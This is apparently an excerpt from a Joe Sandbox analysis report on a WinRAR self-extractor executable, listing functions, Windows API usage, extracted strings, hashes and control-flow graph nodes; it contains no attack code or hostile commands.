                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 1048086575-3710569615
                                      • Opcode ID: 629b10c3665e344ee684b2b55b89b65b3a0894402e96aef3b0bef22df42a097a
                                      • Instruction ID: 0d5b60ff3745ddd7b3a7faa39a59e8ced17cdbcbad20b0dd60b34c9627788e5c
                                      • Opcode Fuzzy Hash: 629b10c3665e344ee684b2b55b89b65b3a0894402e96aef3b0bef22df42a097a
                                      • Instruction Fuzzy Hash: F512A131E19B8785EB10DF28E8452B96361FF85788F5842B5DA9DE7AA5EF3CE144C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36A46C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                      • String ID: $%s:$CAPTION
                                      • API String ID: 1936833115-404845831
                                      • Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                      • Instruction ID: 2a04ca3f7cba239222099334720e5eb17df812be99aaf397e8c043911bdd3b2d
                                      • Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                      • Instruction Fuzzy Hash: BE91F532B1865286E718DF29F80066A67A1FF84788F585535EE4EE7B58DF3CE805CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3785A4 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                      • String ID: PNG
                                      • API String ID: 541704414-364855578
                                      • Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                      • Instruction ID: def128fe6a74b349f6939d8a92f71fd5a92076f1db7cef3f6fbc74ad92672810
                                      • Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                      • Instruction Fuzzy Hash: 13414C21A09B4686EF148F56E544379ABA0AF88B98F1C04B5CE4ED73A4EF7CE5498300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35F940 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1396COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: __tmp_reference_source_
                                      • API String ID: 3668304517-685763994
                                      • Opcode ID: 214bf20a8b03f5f16f094fffc1da824657209fc8bfb2e438ce670c08401f05ec
                                      • Instruction ID: e0462518b49d23aa8a461543fc264c002390627f98d7c7b8fdd95458855f23f7
                                      • Opcode Fuzzy Hash: 214bf20a8b03f5f16f094fffc1da824657209fc8bfb2e438ce670c08401f05ec
                                      • Instruction Fuzzy Hash: 48D2A762A086C292EA64CB65E1413FE67A1FF45788F4841B2DB9DE37A5DF3CE454C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A354840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: CMT
                                      • API String ID: 3668304517-2756464174
                                      • Opcode ID: c0c8aba76357acd8a73ae7fdd4341b15dbe5ae0ad7cd8641e383336613531407
                                      • Instruction ID: 96e36848103c6ef80afcae487c2441dd894a8b2243e9cff9acafdb154bf8d437
                                      • Opcode Fuzzy Hash: c0c8aba76357acd8a73ae7fdd4341b15dbe5ae0ad7cd8641e383336613531407
                                      • Instruction Fuzzy Hash: 14E2DB22B0868286EB28DB79D5502FD67A1EF49388F4800B6DB5EE7796DF3CE555C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36407C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3472 7ff65a36407c-7ff65a3640b3 3473 7ff65a3640b9-7ff65a3640c1 3472->3473 3474 7ff65a364192-7ff65a36419f FindNextFileW 3472->3474 3475 7ff65a3640c6-7ff65a3640d8 FindFirstFileW 3473->3475 3476 7ff65a3640c3 3473->3476 3477 7ff65a3641b3-7ff65a3641b6 3474->3477 3478 7ff65a3641a1-7ff65a3641b1 GetLastError 3474->3478 3475->3477 3479 7ff65a3640de-7ff65a364106 call 7ff65a3669cc 3475->3479 3476->3475 3481 7ff65a3641b8-7ff65a3641c0 3477->3481 3482 7ff65a3641d1-7ff65a364213 call 7ff65a3878fc call 7ff65a35129c call 7ff65a368050 3477->3482 3480 7ff65a36418a-7ff65a36418d 3478->3480 3494 7ff65a364127-7ff65a364130 3479->3494 3495 7ff65a364108-7ff65a364124 FindFirstFileW 3479->3495 3483 7ff65a3642ab-7ff65a3642ce call 7ff65a3822a0 3480->3483 3485 7ff65a3641c2 3481->3485 3486 7ff65a3641c5-7ff65a3641cc call 7ff65a3520b0 3481->3486 3508 7ff65a36424c-7ff65a3642a6 call 7ff65a36f0e8 * 3 3482->3508 3509 7ff65a364215-7ff65a36422c 3482->3509 3485->3486 3486->3482 3497 7ff65a364169-7ff65a36416d 3494->3497 3498 7ff65a364132-7ff65a364149 3494->3498 3495->3494 3497->3477 3500 7ff65a36416f-7ff65a36417e GetLastError 3497->3500 3501 7ff65a36414b-7ff65a36415e 3498->3501 3502 7ff65a364164 call 7ff65a38218c 3498->3502 3506 7ff65a364188 3500->3506 3507 7ff65a364180-7ff65a364186 3500->3507 3501->3502 3503 7ff65a3642d5-7ff65a3642db call 7ff65a387884 3501->3503 3502->3497 3506->3480 3507->3480 3507->3506 3508->3483 3511 7ff65a364247 call 7ff65a38218c 3509->3511 3512 7ff65a36422e-7ff65a364241 3509->3512 3511->3508 3512->3511 3515 7ff65a3642cf-7ff65a3642d4 call 7ff65a387884 3512->3515 3515->3503
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                      • String ID:
                                      • API String ID: 474548282-0
                                      • Opcode ID: 46115452f30c197c0bbe3f06a9c7d7d891456a078a513d98ffa6df2e4323a7a9
                                      • Instruction ID: 1d3354c6bf23262817067e99aafcfce73390ac28793ca9496c55cb71a2786c3d
                                      • Opcode Fuzzy Hash: 46115452f30c197c0bbe3f06a9c7d7d891456a078a513d98ffa6df2e4323a7a9
                                      • Instruction Fuzzy Hash: 8D61B562A0864286DA109F28E94126D6361FF857A8F145371EBBEE37D9DF3CD544C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A355E2C Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CMT
                                      • API String ID: 0-2756464174
                                      • Opcode ID: 26aee052e4198fdaa73040eb9262e84a8c472a73f485ca08826947fa9a3fbcb8
                                      • Instruction ID: 8f694b4af9e6893ceb65ef44d0d25a39e2f38714a4bc0f55a5ef340295c0442a
                                      • Opcode Fuzzy Hash: 26aee052e4198fdaa73040eb9262e84a8c472a73f485ca08826947fa9a3fbcb8
                                      • Instruction Fuzzy Hash: AC42BC22B086829AEB18DB78C1512FD67A1EF5934CF4801B6DB5EE3696DF3CE559C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A371EA0 Relevance: .3, Instructions: 337COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b498f61a73da8f949939d090e5f543a3b819356a7f10811b6f229d37e49463a0
                                      • Instruction ID: c615de115788db80be43de71a14a18368b79605eda81835dee305a5e21cec85a
                                      • Opcode Fuzzy Hash: b498f61a73da8f949939d090e5f543a3b819356a7f10811b6f229d37e49463a0
                                      • Instruction Fuzzy Hash: CBE1D162A082C2CAEF60CF29A4442AD7B90FF4574CF094179DB5EE7A85DE3DF6858704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A373404 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                      • Instruction ID: 7ec22a0c408c48247e3f88d2a4adfce20b5f12e6cc061b045a8b97517e3dcb61
                                      • Opcode Fuzzy Hash: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                      • Instruction Fuzzy Hash: 56B1E2A2B05BC992DE58CA66D508BE9A391FB44FC8F488036DE1DAB741DF3CE255C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3648E8 Relevance: .1, Instructions: 136COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID:
                                      • API String ID: 3340455307-0
                                      • Opcode ID: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                      • Instruction ID: e3901de4ff4d3eeab5f6acfc9eea6cd97de8ca06750aefb406cf2755d62ea866
                                      • Opcode Fuzzy Hash: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                      • Instruction Fuzzy Hash: 2441F622F156928AFB68DF21EA1077A2652EF8478CF089034DF5EE7754DE3CE4868744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36DF4C Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 7ff65a36df4c-7ff65a36dfa0 call 7ff65a3823d0 GetModuleHandleW 3 7ff65a36dff7-7ff65a36e321 0->3 4 7ff65a36dfa2-7ff65a36dfb5 GetProcAddress 0->4 5 7ff65a36e327-7ff65a36e330 call 7ff65a38b708 3->5 6 7ff65a36e47f-7ff65a36e49d call 7ff65a366414 call 7ff65a367db4 3->6 7 7ff65a36dfb7-7ff65a36dfc6 4->7 8 7ff65a36dfcf-7ff65a36dfe2 GetProcAddress 4->8 5->6 15 7ff65a36e336-7ff65a36e379 call 7ff65a366414 CreateFileW 5->15 19 7ff65a36e4a1-7ff65a36e4ab call 7ff65a365164 6->19 7->8 8->3 11 7ff65a36dfe4-7ff65a36dff4 8->11 11->3 22 7ff65a36e46c-7ff65a36e47a CloseHandle call 7ff65a351fa0 15->22 23 7ff65a36e37f-7ff65a36e392 SetFilePointer 15->23 27 7ff65a36e4ad-7ff65a36e4b8 call 7ff65a36dd04 19->27 28 7ff65a36e4e0-7ff65a36e528 call 7ff65a3878fc call 7ff65a35129c call 7ff65a368050 call 7ff65a351fa0 call 7ff65a36327c 19->28 22->6 23->22 25 7ff65a36e398-7ff65a36e3ba ReadFile 23->25 25->22 29 7ff65a36e3c0-7ff65a36e3ce 25->29 27->28 39 7ff65a36e4ba-7ff65a36e4de CompareStringW 27->39 66 7ff65a36e52d-7ff65a36e530 28->66 32 7ff65a36e77c-7ff65a36e783 call 7ff65a3825a4 29->32 33 7ff65a36e3d4-7ff65a36e428 call 7ff65a3878fc call 7ff65a35129c 29->33 48 7ff65a36e43f-7ff65a36e455 call 7ff65a36d05c 33->48 39->28 42 7ff65a36e539-7ff65a36e542 39->42 42->19 46 7ff65a36e548 42->46 49 7ff65a36e54d-7ff65a36e550 46->49 61 7ff65a36e42a-7ff65a36e43a call 7ff65a36dd04 48->61 62 7ff65a36e457-7ff65a36e467 call 7ff65a351fa0 * 2 48->62 52 7ff65a36e5bb-7ff65a36e5be 49->52 53 7ff65a36e552-7ff65a36e555 49->53 57 7ff65a36e5c4-7ff65a36e5d7 call 7ff65a367e70 call 7ff65a365164 52->57 58 7ff65a36e73e-7ff65a36e77b call 7ff65a351fa0 * 2 call 7ff65a3822a0 52->58 59 7ff65a36e559-7ff65a36e5a9 call 7ff65a3878fc call 7ff65a35129c call 7ff65a368050 call 7ff65a351fa0 call 7ff65a36327c 53->59 82 7ff65a36e5dd-7ff65a36e67d call 7ff65a36dd04 * 2 call 7ff65a36aaa0 call 7ff65a36da14 call 7ff65a36aaa0 call 7ff65a36dba8 call 7ff65a37872c call 7ff65a3519e0 57->82 83 7ff65a36e682-7ff65a36e6cf call 7ff65a36da14 AllocConsole 57->83 107 7ff65a36e5ab-7ff65a36e5b4 59->107 108 7ff65a36e5b8 59->108 61->48 62->22 72 7ff65a36e54a 66->72 73 7ff65a36e532 66->73 72->49 73->42 100 7ff65a36e730-7ff65a36e737 call 7ff65a3519e0 ExitProcess 82->100 94 7ff65a36e72c 83->94 95 7ff65a36e6d1-7ff65a36e726 GetCurrentProcessId AttachConsole call 7ff65a36e7e4 call 7ff65a36e7d4 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->100 95->94 107->59 112 7ff65a36e5b6 107->112 108->52 112->52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                      • API String ID: 1496594111-2013832382
                                      • Opcode ID: 5ce2597d7fdccac93bce9593f824b9950da015bd240da865e516934723f6dab5
                                      • Instruction ID: 35b9a223c3644534db0397a9ec65cad224d752e48e304ad4b4664a708fc425c3
                                      • Opcode Fuzzy Hash: 5ce2597d7fdccac93bce9593f824b9950da015bd240da865e516934723f6dab5
                                      • Instruction Fuzzy Hash: 4A322A31A09B8299EB219F64E9411E933A4FF4835CF580276DA4DE77A5EF3CE259C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36989C Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A368E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65A368F4D
                                      • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF65A369F35
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A36A3EF
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A36A3F5
                                        • Part of subcall function 00007FF65A370B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF65A370AC4), ref: 00007FF65A370B69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                      • API String ID: 3629253777-3268106645
                                      • Opcode ID: ade189b4b6c588eec8a7f4367c76198bca2ff4dad6effa83c1c8df0ea525dc49
                                      • Instruction ID: 37ffade15db1635ba6069231d02c56e49d10c681d6b463cc9b0f02f7da6ec14a
                                      • Opcode Fuzzy Hash: ade189b4b6c588eec8a7f4367c76198bca2ff4dad6effa83c1c8df0ea525dc49
                                      • Instruction Fuzzy Hash: E862BD22E19A8285EB20DF24E4482BD63A1FF4478CF9851B2DA5DEB795EF3CE545C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A381880 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
